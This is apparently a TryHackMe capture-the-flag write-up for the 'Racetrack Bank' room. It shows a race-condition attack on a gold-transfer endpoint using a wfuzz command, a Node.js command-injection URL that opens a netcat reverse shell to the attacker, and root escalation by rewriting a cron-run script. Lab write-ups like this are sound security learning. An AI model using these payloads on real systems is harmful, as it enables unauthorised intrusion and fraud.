Racetrack Bank | Writeup

CTF, CyberSecurity, TryHackMe

Racetrack Bank #

Hallå gubbar, this one is a lil bit difficult but hey we can do it specially if you want to learn more and practice on race condition vulnerabilities … check the box Racetrack Bank

Enumeration #

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After we scan using Nmap we found 80 port open = http


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then it will redirect you to the login page we found other 2 pages give gold ( to send gold to other users) / purchase (buy premium )

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We also have 1 gold ….

Nothing else so what we need to do is find out the premium features but how is that ?

Drom the description and title of the box is possible to say that there’s race conditions vulnerabilities

so let fuzz it!!

Exploitation #

How ? we need to fuzz and send multi requests to transfer gold from an account to an other Result: Farming gold

What we need ?

  1. Creating accounts
  2. Cookies id tag
  3. Loop requests
  4. Buy premium

i will try to make it easy for you

  1. create account ( test22 ) also create an other account in private tab (test99)

we need to intercept the gold transfer request using BURPYYY…

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  1. Now we got cookie id tag (request)

  2. Loop requests in this case we will use wfuzz

but first create txt file and each line should have number 1 ( 1 gold remember ) and you should have 20 000 line

” Dont worry i said i will make it easy for you “


command :

wfuzz -w /root/Desktop/gold.txt -u http://Box-ip/api/givegold -H "Content-Type: application/x-www-form-urlencoded" -b "Cookie ID" -d "user=test99&amount=FUZZ"

So don’t waste too much time going back from an account t oan other

just once you reach 600 gold change 1 gold to 6 gold in text file

also send gold from account test22 to test99

also send back 600 from test99 without fuzzing it

then go back to test22 and fuzz it again

  1. so in 3 steps you will have more 10k gold enough to buy premium !

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Reverse shell #

To be frank i tried many injections command but nothing worked until checked source code (node.js)

so just google node.js reverse shell

http://Ip-box/premuimfeatures.html?ans=require("child_process").exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc YOUR-IP PORT >/tmp/f')


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Flags #

we got the user flag :

~$ cat  user.txt

Now we need to privesc to root but i’m lazy specially late nights so just searched for backup files and we find sh/cleanup/file called cleanupscript.sh that runs every minute.

So we can optin to get second reverse shell as root or copy and output root flag

so you either

rm cleanupscript.sh


mv cleanupscript.sh > cleanupscript.sh.backup ( check dogcat room similar)


echo 'cat /root/root.txt > /home/brian/root_flag.txt' > cleanupscript.sh
chmod 777 cleanupscript.sh

Run it and wait 1 min then check for for output

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See you next time ……